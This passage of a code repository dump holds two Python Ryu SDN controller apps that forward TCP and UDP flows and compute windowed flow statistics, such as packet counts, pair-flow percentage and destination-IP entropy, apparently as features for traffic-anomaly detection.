sort_keys=True)) 93 | 94 | # print(stat) 95 | duration = stat.duration_nsec / 1000000000.0 + stat.duration_sec 96 | 97 | 98 | # extract Pair_flows here 99 | flow_IP = stat.match['ipv4_dst'], stat.match['ipv4_src'] 100 | sorted_flow_IP = tuple(sorted(flow_IP)) 101 | dst_IP = stat.match['ipv4_dst'] 102 | 103 | packetcount_list.append(stat.packet_count) 104 | bytescount_list.append(stat.byte_count) 105 | Pair_IP_hashlist.add(hash(sorted_flow_IP)) 106 | IP_hashlist.add(hash(flow_IP)) 107 | 108 | dst_IP_counter[dst_IP] += 1 109 | 110 | # within window 111 | if (duration - window <= 0): 112 | window_packetcount_list.append(stat.packet_count) 113 | window_bytescount_list.append(stat.byte_count) 114 | window_Pair_IP_hashlist.add(hash(sorted_flow_IP)) 115 | window_IP_hashlist.add(hash(flow_IP)) 116 | window_dst_IP_counter[dst_IP] += 1 117 | 118 | packetcount = len(packetcount_list) 119 | mean_packetcount = mean(packetcount_list) 120 | mean_bytescount = mean(bytescount_list) 121 | Num_Pair_flows = len(IP_hashlist) - len(Pair_IP_hashlist) 122 | PPf = (2*Num_Pair_flows)/float(len(IP_hashlist)) 123 | 124 | window_packetcount = len(window_packetcount_list) 125 | window_mean_packetcount = mean(window_packetcount_list) 126 | window_mean_bytescount = mean(window_bytescount_list) 127 | window_Num_Pair_flows = len(window_IP_hashlist) - len(window_Pair_IP_hashlist) 128 | windowPPf = (2*window_Num_Pair_flows)/float(len(window_IP_hashlist)) 129 | 130 | # entropy 131 | dstIP_counter_list = dst_IP_counter.values() 132 | for value in dstIP_counter_list: 133 | dstIP_probability_list.append(value/float(packetcount)) 134 | window_dstIP_counter_list = window_dst_IP_counter.values() 135 | for value in window_dstIP_counter_list: 136 | window_dstIP_probability_list.append(value/float(window_packetcount)) 137 | 138 | for value in dstIP_probability_list: 139 | entropy_list.append(value * log(value, 2)) 140 | for value in window_dstIP_probability_list: 141 | window_entropy_list.append(value * log(value, 2)) 142 | entropy = -sum(entropy_list) 143 | window_entropy = -sum(window_entropy_list) 144 | 145 | self.logger.info("%65s" % "1. Packet count") 146 | self.logger.info("%40s %40s" % ("all packet count: ", str(packetcount))) 147 | self.logger.info("%40s %40s" % ("window's packet count: ", str(window_packetcount))) 148 | self.logger.info("%40s %40s" % ("packet count ratio: ", str(window_packetcount/float(packetcount)))) 149 | 150 | self.logger.info("%65s" % "2. Packet Mean") 151 | self.logger.info("%40s %40s" % ("mean of all packet count: ", str(mean_packetcount))) 152 | self.logger.info("%40s %40s" % ("mean of window's packet count: ", str(window_mean_packetcount))) 153 | self.logger.info("%40s %40s" % ("mean ratio: ", str(window_mean_packetcount/mean_packetcount))) 154 | 155 | self.logger.info("%65s" % "3. Bytes Mean") 156 | self.logger.info("%40s %40s" % ("mean of all bytes count: ", str(mean_bytescount))) 157 | self.logger.info("%40s %40s" % ("mean of window's bytes count: ", str(window_mean_bytescount))) 158 | self.logger.info("%40s %40s" % ("mean ratio: ", str(window_mean_bytescount/mean_bytescount))) 159 | 160 | self.logger.info("%65s" % "4. Percentage of Pair-Flow") 161 | self.logger.info("%40s %40s" % ("pair-flow: ", str(Num_Pair_flows))) 162 | self.logger.info("%40s %40s" % ("flow: ", str(len(IP_hashlist)))) 163 | self.logger.info("%40s %40s" % ("window's pair-flow: ", str(window_Num_Pair_flows))) 164 | self.logger.info("%40s %40s" % ("window's flow: ", str(len(window_IP_hashlist)))) 165 | self.logger.info("%40s %40s" % ("percentage of all pair-flow: ", str(PPf))) 166 | self.logger.info("%40s %40s" % ("percentage of window's pair-flow: ", str( windowPPf))) 167 | self.logger.info("%40s %40s" % ("pair-flow ratio: ", str(windowPPf/PPf))) 168 | 169 | self.logger.info("%65s" % "5. Entropy") 170 | self.logger.info("%40s %40s" % ("dst IP counter list: ", dstIP_counter_list)) 171 | self.logger.info("%40s %40s" % ("window's dst IP counter list: ", window_dstIP_counter_list)) 172 | self.logger.info("%40s %40s" % ("entropy: ", entropy)) 173 | self.logger.info("%40s %40s" % ("window's entropy: ", window_entropy)) 174 | self.logger.info("%40s %40s" % ("entropy ratio: ", window_entropy/entropy)) 175 | # for stat in sorted([flow for flow in body if flow.priority == 1], 176 | # key=lambda flow: (flow.match['in_port'], 177 | # flow.match['eth_dst'])): 178 | # self.logger.info('%016x %8x %17s %8x %8d %8d', 179 | # ev.msg.datapath.id, 180 | # stat.match['in_port'], stat.match['eth_dst'], 181 | # stat.instructions[0].actions[0].port, 182 | # stat.packet_count, stat.byte_count) 183 | 184 | @set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER) 185 | def _port_stats_reply_handler(self, ev): 186 | body = ev.msg.body 187 | # self.logger.info("This is %016x EventOFPPortStateReply.", ev.msg.datapath.id) 188 | 189 | 190 | 191 | def _monitor(self): 192 | while True: 193 | for dp in self.datapaths.values(): 194 | self._request_stats(dp) 195 | hub.sleep(10) 196 | 197 | def _request_stats(self, datapath): 198 | self.logger.debug("send stats request: %016x", datapath.id) 199 | ofproto = datapath.ofproto 200 | parser = datapath.ofproto_parser 201 | # send FlowStatsRequest & PortStatsRequest packet to switch(datapath) 202 | req = parser.OFPFlowStatsRequest(datapath) 203 | datapath.send_msg(req) 204 | req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY) 205 | datapath.send_msg(req) 206 | 207 | 208 | def add_flow(self, datapath, priority, idle_timeout, match, actions, buffer_id=None): 209 | ofproto = datapath.ofproto 210 | parser = datapath.ofproto_parser 211 | 212 | inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, 213 | actions)] 214 | # self.logger.info("\n#########Add flow #########") 215 | # self.logger.info(match) 216 | # self.logger.info("###########################\n") 217 | if buffer_id: 218 | mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id, 219 | priority=priority, idle_timeout=idle_timeout, 220 | match=match, instructions=inst) 221 | else: 222 | mod = parser.OFPFlowMod(datapath=datapath, priority=priority, 223 | match=match, idle_timeout=idle_timeout, instructions=inst) 224 | datapath.send_msg(mod) 225 | 226 | @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER) 227 | def _packet_in_handler(self, ev): 228 | 229 | # If you hit this you might want to increase 230 | # the "miss_send_length" of your switch 231 | 232 | # ev is the Openflow isntance 233 | if ev.msg.msg_len < ev.msg.total_len: 234 | self.logger.debug("packet truncated: only %s of %s bytes", 235 | ev.msg.msg_len, ev.msg.total_len) 236 | msg = ev.msg 237 | datapath = msg.datapath 238 | ofproto = datapath.ofproto 239 | parser = datapath.ofproto_parser 240 | in_port = msg.match['in_port'] 241 | 242 | pkt = packet.Packet(msg.data) 243 | eth = pkt.get_protocol(ethernet.ethernet) 244 | # print(eth.ethertype) 245 | 246 | # print("THIS PACKET IS:") 247 | # print("layer 3 protocol") 248 | # print(pkt_ipv4) 249 | # print("layer 2 protocol") 250 | # self.logger.info(eth) 251 | 252 | if eth.ethertype == ether_types.ETH_TYPE_LLDP: 253 | # ignore lldp packet 254 | # self.logger.info('ETH_TYPE_LLDP in\n') 255 | return 256 | if eth.ethertype == ether_types.ETH_TYPE_IPV6: 257 | # ignore ipv6 packet 258 | # self.logger.info('ETH_TYPE_IPV6 in\n') 259 | return 260 | 261 | # print("###################################################################") 262 | # self.logger.info(pkt) 263 | # self.logger.info(self.mac_to_port) 264 | dst = eth.dst 265 | src = eth.src 266 | data = msg.data 267 | dpid = datapath.id 268 | self.mac_to_port.setdefault(dpid, {}) 269 | 270 | # learn a mac address to avoid FLOOD next time. 271 | self.mac_to_port[dpid][src] = in_port 272 | 273 | if dst in self.mac_to_port[dpid]: 274 | out_port = self.mac_to_port[dpid][dst] 275 | else: 276 | out_port = ofproto.OFPP_FLOOD 277 | 278 | # self.logger.info(self.mac_to_port) 279 | 280 | # self.logger.info("packet in %s %s %s %s", dpid, src, dst, in_port) 281 | # self.logger.info(out_port) 282 | # self.logger.info("THIS PACKET CONTAIN:") 283 | # for p in pkt.protocols: 284 | # self.logger.info(1) 285 | 286 | 287 | # if UDP packet_in into controller 288 | if pkt.get_protocol(udp.udp): 289 | pkt_layer4 = pkt.get_protocol(udp.udp) 290 | pkt_layer3 = pkt.get_protocol(ipv4.ipv4) 291 | layer4_srcport = pkt_layer4.src_port 292 | layer4_dstport = pkt_layer4.dst_port 293 | layer3_srcip = pkt_layer3.src 294 | layer3_dstip = pkt_layer3.dst 295 | match = parser.OFPMatch(ipv4_src=layer3_srcip, ipv4_dst=layer3_dstip, 296 | eth_type=0x0800, ip_proto=0x11, 297 | udp_src=layer4_srcport, udp_dst=layer4_dstport) 298 | actions = [parser.OFPActionOutput(out_port)] 299 | idle_timeout = 300 300 | self.add_flow(datapath, 3, idle_timeout, match, actions) 301 | # TODO: Buffer id understanding 302 | out = parser.OFPPacketOut(datapath=datapath, buffer_id=ofproto.OFP_NO_BUFFER, 303 | in_port=in_port, actions=actions, data=data) 304 | datapath.send_msg(out) 305 | return 306 | 307 | # if tcp packet_in into controller 308 | if pkt.get_protocol(tcp.tcp): 309 | pkt_layer4 = pkt.get_protocol(tcp.tcp) 310 | pkt_layer3 = pkt.get_protocol(ipv4.ipv4) 311 | layer4_srcport = pkt_layer4.src_port 312 | layer4_dstport = pkt_layer4.dst_port 313 | layer3_srcip = pkt_layer3.src 314 | layer3_dstip = pkt_layer3.dst 315 | # self.logger.info(layer4_srcport) 316 | # self.logger.info(layer4_dstport) 317 | # self.logger.info(layer3_srcip) 318 | # self.logger.info(layer3_dstip) 319 | match = parser.OFPMatch(ipv4_src=layer3_srcip, ipv4_dst=layer3_dstip, 320 | eth_type=0x0800, ip_proto=0x06, 321 | tcp_src=layer4_srcport, tcp_dst=layer4_dstport) 322 | actions = [parser.OFPActionOutput(out_port)] 323 | idle_timeout = 300 324 | self.add_flow(datapath, 3, idle_timeout, match, actions) 325 | # TODO: Buffer id understanding 326 | out = parser.OFPPacketOut(datapath=datapath, buffer_id=ofproto.OFP_NO_BUFFER, 327 | in_port=in_port, actions=actions, data=data) 328 | datapath.send_msg(out) 329 | return 330 | 331 | # # TODO: Buffer id understanding 332 | # out = parser.OFPPacketOut(datapath=datapath, buffer_id=ofproto.OFP_NO_BUFFER, 333 | # in_port=in_port, actions=actions, data=data) 334 | 335 | 336 | # default routing (ARP) 337 | # actions = [parser.OFPActionOutput(out_port)] 338 | # if out_port != ofproto.OFPP_FLOOD: 339 | # match = parser.OFPMatch(in_port=in_port, eth_dst=dst) 340 | # # self.logger.info("ADD AGAIN? + return") 341 | # self.add_flow(datapath, 1, match, actions) 342 | 343 | # # construct packet_out message and send it. 344 | # out = parser.OFPPacketOut(datapath=datapath, 345 | # buffer_id=ofproto.OFP_NO_BUFFER, 346 | # in_port=in_port, actions=actions, 347 | # data=msg.data) 348 | # self.logger.info("SEND!!!!!!!!") 349 | # datapath.send_msg(out) 350 | -------------------------------------------------------------------------------- /ryu/app.py: -------------------------------------------------------------------------------- 1 | from ryu.base import app_manager 2 | from ryu.controller import ofp_event 3 | from ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER, DEAD_DISPATCHER 4 | from ryu.controller.handler import set_ev_cls 5 | from ryu.ofproto import ofproto_v1_3 6 | from ryu.lib.packet import ipv4 7 | from ryu.lib.packet import packet 8 | from ryu.lib.packet import ethernet 9 | from ryu.lib.packet import ether_types 10 | from ryu.lib.packet import tcp 11 | from ryu.lib.packet import udp 12 | from ryu.lib.packet import arp 13 | from ryu.lib import hub 14 | import json 15 | 16 | from collections import Counter 17 | from math import log 18 | from numpy import median 19 | from numpy import mean 20 | from datetime import datetime 21 | 22 | class Controller(app_manager.RyuApp): 23 | OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION] 24 | 25 | def __init__(self, *args, **kwargs): 26 | super(Controller, self).__init__(*args, **kwargs) 27 | self.mac_to_port = {} 28 | self.datapaths = {} 29 | self.monitor_thread = hub.spawn(self._monitor) 30 | self.packets_per_flow_list = [] 31 | 32 | 33 | 34 | # SwitchFeatures packet handler 35 | @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER) 36 | def _switch_features_handler(self, ev): 37 | datapath = ev.msg.datapath 38 | ofproto = datapath.ofproto 39 | parser = datapath.ofproto_parser 40 | match = parser.OFPMatch() 41 | actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER, 42 | ofproto.OFPCML_NO_BUFFER)] 43 | # Add default flow 44 | self.add_flow(datapath, 0, 0, match, actions) 45 | 46 | # let UDP through controller 47 | match = parser.OFPMatch(eth_type=0x0800, ip_proto=0x11) 48 | self.add_flow(datapath, 2, 0, match, actions) 49 | match = parser.OFPMatch(eth_type=0x0800, ip_proto=0x06) 50 | self.add_flow(datapath, 2, 0, match, actions) 51 | 52 | 53 | # StateChange packet handler 54 | @set_ev_cls(ofp_event.EventOFPStateChange, [MAIN_DISPATCHER, DEAD_DISPATCHER]) 55 | def _state_change_handler(self, ev): 56 | datapath = ev.datapath 57 | if ev.state == MAIN_DISPATCHER: 58 | if datapath.id not in self.datapaths: 59 | self.logger.info('register datapath: %016x', datapath.id) 60 | self.datapaths[datapath.id] = datapath 61 | elif ev.state == DEAD_DISPATCHER: 62 | if datapath.id in self.datapaths: 63 | self.logger.info('unregister datapath: %016x', datapath.id) 64 | del self.datapaths[datapath.id] 65 | 66 | # FlowStatsReply packet handler 67 | @set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER) 68 | def _flow_stats_reply_handler(self, ev): 69 | body = ev.msg.body 70 | self.logger.info("This is %016x EventOFPFlowStatsReply.", ev.msg.datapath.id) 71 | # self.logger.info('%s', json.dumps(ev.msg.to_jsondict(), ensure_ascii=True, 72 | # indent=3, sort_keys=True)) 73 | 74 | packetcount_list = [] 75 | bytescount_list = [] 76 | dst_IP_counter = Counter() 77 | Pair_IP_hashlist = set() 78 | IP_hashlist = set() 79 | 80 | # window = 10s 81 | window = 10 82 | window_packetcount_list = [] 83 | window_bytescount_list = [] 84 | window_dst_IP_counter = Counter() 85 | window_Pair_IP_hashlist = set() 86 | window_IP_hashlist = set() 87 | 88 | dstIP_probability_list = [] 89 | window_dstIP_probability_list = [] 90 | entropy_list = [] 91 | window_entropy_list = [] 92 | 93 | for stat in sorted([flow for flow in body if (flow.priority == 3)]): 94 | 95 | # self.logger.info('%s', json.dumps(ev.msg.to_jsondict(), ensure_ascii=True, indent=3, sort_keys=True)) 96 | 97 | # print(stat) 98 | duration = stat.duration_nsec / 1000000000.0 + stat.duration_sec 99 | 100 | 101 | # extract Pair_flows here 102 | flow_IP = stat.match['ipv4_dst'], stat.match['ipv4_src'] 103 | sorted_flow_IP = tuple(sorted(flow_IP)) 104 | dst_IP = stat.match['ipv4_dst'] 105 | 106 | packetcount_list.append(stat.packet_count) 107 | bytescount_list.append(stat.byte_count) 108 | Pair_IP_hashlist.add(hash(sorted_flow_IP)) 109 | IP_hashlist.add(hash(flow_IP)) 110 | 111 | dst_IP_counter[dst_IP] += 1 112 | 113 | # within window 114 | if (duration - window <= 0): 115 | window_packetcount_list.append(stat.packet_count) 116 | window_bytescount_list.append(stat.byte_count) 117 | window_Pair_IP_hashlist.add(hash(sorted_flow_IP)) 118 | window_IP_hashlist.add(hash(flow_IP)) 119 | window_dst_IP_counter[dst_IP] += 1 120 | 121 | packetcount = len(packetcount_list) 122 | if (packetcount != 0): 123 | mean_packetcount = mean(packetcount_list) 124 | mean_bytescount = mean(bytescount_list) 125 | else: 126 | mean_packetcount = 0 127 | mean_bytescount = 0 128 | 129 | if (len(IP_hashlist) != 0): 130 | Num_Pair_flows = len(IP_hashlist) - len(Pair_IP_hashlist) 131 | PPf = (2*Num_Pair_flows)/float(len(IP_hashlist)) 132 | else: 133 | Num_Pair_flows = 0 134 | PPf = 0 135 | 136 | window_packetcount = len(window_packetcount_list) 137 | if (window_packetcount != 0): 138 | window_mean_packetcount = mean(window_packetcount_list) 139 | window_mean_bytescount = mean(window_bytescount_list) 140 | else: 141 | window_mean_packetcount = 0 142 | window_mean_bytescount = 0 143 | 144 | if (len(window_IP_hashlist) != 0): 145 | window_Num_Pair_flows = len(window_IP_hashlist) - len(window_Pair_IP_hashlist) 146 | windowPPf = (2*window_Num_Pair_flows)/float(len(window_IP_hashlist)) 147 | else: 148 | window_Num_Pair_flows = 0 149 | windowPPf = 0 150 | 151 | # entropy 152 | dstIP_counter_list = dst_IP_counter.values() 153 | for value in dstIP_counter_list: 154 | dstIP_probability_list.append(value/float(packetcount)) 155 | window_dstIP_counter_list = window_dst_IP_counter.values() 156 | for value in window_dstIP_counter_list: 157 | window_dstIP_probability_list.append(value/float(window_packetcount)) 158 | 159 | for value in dstIP_probability_list: 160 | entropy_list.append(value * log(value, 2)) 161 | for value in window_dstIP_probability_list: 162 | window_entropy_list.append(value * log(value, 2)) 163 | entropy = -sum(entropy_list) 164 | window_entropy = -sum(window_entropy_list) 165 | 166 | if (packetcount == 0): 167 | packet_count_ratio = 0 168 | else: 169 | packet_count_ratio = (window_packetcount/float(packetcount)) 170 | 171 | if (mean_packetcount == 0): 172 | mean_ratio = 0 173 | else: 174 | mean_ratio = window_mean_packetcount/mean_packetcount 175 | 176 | if (mean_bytescount == 0): 177 | mean_ratio = 0 178 | else: 179 | mean_ratio = window_mean_bytescount/mean_bytescount 180 | 181 | 182 | print("%65s" % "1. Packet count") 183 | print("%40s %40s" % ("all packet count: ", str(packetcount))) 184 | print("%40s %40s" % ("window's packet count: ", str(window_packetcount))) 185 | print("%40s %40s" % ("packet count ratio: ", str(packet_count_ratio))) 186 | 187 | print("%65s" % "2. Packet Mean") 188 | print("%40s %40s" % ("mean of all packet count: ", str(mean_packetcount))) 189 | print("%40s %40s" % ("mean of window's packet count: ", str(window_mean_packetcount))) 190 | print("%40s %40s" % ("packet mean ratio: ", str(mean_ratio))) 191 | 192 | print("%65s" % "3. Bytes Mean") 193 | print("%40s %40s" % ("mean of all bytes count: ", str(mean_bytescount))) 194 | print("%40s %40s" % ("mean of window's bytes count: ", str(window_mean_bytescount))) 195 | print("%40s %40s" % ("bytes mean ratio: ", str(mean_ratio))) 196 | 197 | if (PPf != 0): 198 | PPf_ratio = windowPPf/PPf 199 | else: 200 | PPf_ratio = 0 201 | 202 | if (entropy != 0): 203 | entropy_ratio = window_entropy/entropy 204 | else: 205 | entropy_ratio = 0 206 | 207 | print("%65s" % "4. Percentage of Pair-Flow") 208 | print("%40s %40s" % ("pair-flow: ", str(Num_Pair_flows))) 209 | print("%40s %40s" % ("flow: ", str(len(IP_hashlist)))) 210 | print("%40s %40s" % ("window's pair-flow: ", str(window_Num_Pair_flows))) 211 | print("%40s %40s" % ("window's flow: ", str(len(window_IP_hashlist)))) 212 | print("%40s %40s" % ("percentage of all pair-flow: ", str(PPf))) 213 | print("%40s %40s" % ("percentage of window's pair-flow: ", str( windowPPf))) 214 | print("%40s %40s" % ("pair-flow ratio: ", str(PPf_ratio))) 215 | 216 | print("%65s" % "5. Entropy") 217 | # print("%40s %40s" % ("dst IP counter list: ", dstIP_counter_list)) 218 | # print("%40s %40s" % ("window's dst IP counter list: ", window_dstIP_counter_list)) 219 | print("%40s %40s" % ("entropy: ", entropy)) 220 | print("%40s %40s" % ("window's entropy: ", window_entropy)) 221 | print("%40s %40s" % ("entropy ratio: ", str(entropy_ratio))) 222 | # for stat in sorted([flow for flow in body if flow.priority == 1], 223 | # key=lambda flow: (flow.match['in_port'], 224 | # flow.match['eth_dst'])): 225 | # self.logger.info('%016x %8x %17s %8x %8d %8d', 226 | # ev.msg.datapath.id, 227 | # stat.match['in_port'], stat.match['eth_dst'], 228 | # stat.instructions[0].actions[0].port, 229 | # stat.packet_count, stat.byte_count) 230 | 231 | current_time = datetime.now().strftime('%m%d_%H%M%S') 232 | buffer = "%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s" % (str(packetcount), str(window_packetcount), str(packet_count_ratio), str(mean_packetcount), str(window_mean_packetcount), str(mean_ratio), str(mean_bytescount), 233 | str(window_mean_bytescount), str(mean_ratio), str(Num_Pair_flows), str(len(IP_hashlist)), str(window_Num_Pair_flows), str(len(window_IP_hashlist)), str(PPf), 234 | str(windowPPf), str(PPf_ratio), entropy, window_entropy, str(entropy_ratio)) 235 | print(buffer) 236 | filename = "data/" + current_time 237 | flow_table_log = open(filename, "w+") 238 | flow_table_log.write(buffer) 239 | flow_table_log.close() 240 | 241 | @set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER) 242 | def _port_stats_reply_handler(self, ev): 243 | body = ev.msg.body 244 | # self.logger.info("This is %016x EventOFPPortStateReply.", ev.msg.datapath.id) 245 | 246 | 247 | 248 | def _monitor(self): 249 | while True: 250 | for dp in self.datapaths.values(): 251 | self._request_stats(dp) 252 | hub.sleep(10) 253 | 254 | def _request_stats(self, datapath): 255 | self.logger.debug("send stats request: %016x", datapath.id) 256 | ofproto = datapath.ofproto 257 | parser = datapath.ofproto_parser 258 | # send FlowStatsRequest & PortStatsRequest packet to switch(datapath) 259 | req = parser.OFPFlowStatsRequest(datapath) 260 | datapath.send_msg(req) 261 | req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY) 262 | datapath.send_msg(req) 263 | 264 | 265 | def add_flow(self, datapath, priority, idle_timeout, match, actions, buffer_id=None): 266 | ofproto = datapath.ofproto 267 | parser = datapath.ofproto_parser 268 | 269 | inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, 270 | actions)] 271 | self.logger.info("\n#########Add flow #########") 272 | # self.logger.info(match) 273 | # self.logger.info("###########################\n") 274 | if buffer_id: 275 | mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id, 276 | priority=priority, idle_timeout=idle_timeout, 277 | match=match, instructions=inst) 278 | else: 279 | mod = parser.OFPFlowMod(datapath=datapath, priority=priority, 280 | match=match, idle_timeout=idle_timeout, instructions=inst) 281 | datapath.send_msg(mod) 282 | 283 | @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER) 284 | def _packet_in_handler(self, ev): 285 | 286 | # If you hit this you might want to increase 287 | # the "miss_send_length" of your switch 288 | 289 | # ev is the Openflow isntance 290 | if ev.msg.msg_len < ev.msg.total_len: 291 | self.logger.debug("packet truncated: only %s of %s bytes", 292 | ev.msg.msg_len, ev.msg.total_len) 293 | msg = ev.msg 294 | datapath = msg.datapath 295 | ofproto = datapath.ofproto 296 | parser = datapath.ofproto_parser 297 | in_port = msg.match['in_port'] 298 | 299 | pkt = packet.Packet(msg.data) 300 | eth = pkt.get_protocol(ethernet.ethernet) 301 | # print(eth.ethertype) 302 | 303 | # print("THIS PACKET IS:") 304 | # print("layer 3 protocol") 305 | # print(pkt_ipv4) 306 | # print("layer 2 protocol") 307 | # self.logger.info(eth) 308 | 309 | if eth.ethertype == ether_types.ETH_TYPE_LLDP: 310 | # ignore lldp packet 311 | # self.logger.info('ETH_TYPE_LLDP in\n') 312 | return 313 | if eth.ethertype == ether_types.ETH_TYPE_IPV6: 314 | # ignore ipv6 packet 315 | # self.logger.info('ETH_TYPE_IPV6 in\n') 316 | return 317 | 318 | # print("###################################################################") 319 | # self.logger.info(pkt) 320 | # self.logger.info(self.mac_to_port) 321 | dst = eth.dst 322 | src = eth.src 323 | data = msg.data 324 | dpid = datapath.id 325 | self.mac_to_port.setdefault(dpid, {}) 326 | 327 | # learn a mac address to avoid FLOOD next time. 328 | self.mac_to_port[dpid][src] = in_port 329 | 330 | if dst in self.mac_to_port[dpid]: 331 | out_port = self.mac_to_port[dpid][dst] 332 | else: 333 | out_port = ofproto.OFPP_FLOOD 334 | 335 | # self.logger.info(self.mac_to_port) 336 | 337 | # self.logger.info("packet in %s %s %s %s", dpid, src, dst, in_port) 338 | # self.logger.info(out_port) 339 | # self.logger.info("THIS PACKET CONTAIN:") 340 | # for p in pkt.protocols: 341 | # self.logger.info(1) 342 | 343 | 344 | # if UDP packet_in into controller 345 | if pkt.get_protocol(udp.udp): 346 | pkt_layer4 = pkt.get_protocol(udp.udp) 347 | pkt_layer3 = pkt.get_protocol(ipv4.ipv4) 348 | layer4_srcport = pkt_layer4.src_port 349 | layer4_dstport = pkt_layer4.dst_port 350 | layer3_srcip = pkt_layer3.src 351 | layer3_dstip = pkt_layer3.dst 352 | match = parser.OFPMatch(ipv4_src=layer3_srcip, ipv4_dst=layer3_dstip, 353 | eth_type=0x0800, ip_proto=0x11, 354 | udp_src=layer4_srcport, udp_dst=layer4_dstport) 355 | actions = [parser.OFPActionOutput(out_port)] 356 | idle_timeout = 300 357 | self.add_flow(datapath, 3, idle_timeout, match, actions) 358 | # TODO: Buffer id understanding 359 | out = parser.OFPPacketOut(datapath=datapath, buffer_id=ofproto.OFP_NO_BUFFER, 360 | in_port=in_port, actions=actions, data=data) 361 | datapath.send_msg(out) 362 | return 363 | 364 | # if tcp packet_in into controller 365 | if pkt.get_protocol(tcp.tcp): 366 | pkt_layer4 = pkt.get_protocol(tcp.tcp) 367 | pkt_layer3 = pkt.get_protocol(ipv4.ipv4) 368 | layer4_srcport = pkt_layer4.src_port 369 | layer4_dstport = pkt_layer4.dst_port 370 | layer3_srcip = pkt_layer3.src 371 | layer3_dstip = pkt_layer3.dst 372 | # self.logger.info(layer4_srcport) 373 | # self.logger.info(layer4_dstport) 374 | # self.logger.info(layer3_srcip) 375 | # self.logger.info(layer3_dstip) 376 | match = parser.OFPMatch(ipv4_src=layer3_srcip, ipv4_dst=layer3_dstip, 377 | eth_type=0x0800, ip_proto=0x06, 378 | tcp_src=layer4_srcport, tcp_dst=layer4_dstport) 379 | actions = [parser.OFPActionOutput(out_port)] 380 | idle_timeout = 300 381 | self.add_flow(datapath, 3, idle_timeout, match, actions) 382 | # TODO: Buffer id understanding 383 | out = parser.OFPPacketOut(datapath=datapath, buffer_id=ofproto.OFP_NO_BUFFER, 384 | in_port=in_port, actions=actions, data=data) 385 | datapath.send_msg(out) 386 | return 387 | 388 | # # TODO: Buffer id understanding 389 | # out = parser.OFPPacketOut(datapath=datapath, buffer_id=ofproto.OFP_NO_BUFFER, 390 | # in_port=in_port, actions=actions, data=data) 391 | 392 | 393 | # default routing (ARP) 394 | # actions = [parser.OFPActionOutput(out_port)] 395 | # if out_port != ofproto.OFPP_FLOOD: 396 | # match = parser.OFPMatch(in_port=in_port, eth_dst=dst) 397 | # # self.logger.info("ADD AGAIN? + return") 398 | # self.add_flow(datapath, 1, match, actions) 399 | 400 | # # construct packet_out message and send it. 401 | # out = parser.OFPPacketOut(datapath=datapath, 402 | # buffer_id=ofproto.OFP_NO_BUFFER, 403 | # in_port=in_port, actions=actions, 404 | # data=msg.data) 405 | # self.logger.info("SEND!!!!!!!!") 406 | # datapath.send_msg(out) 407 | --------------------------------------------------------------------------------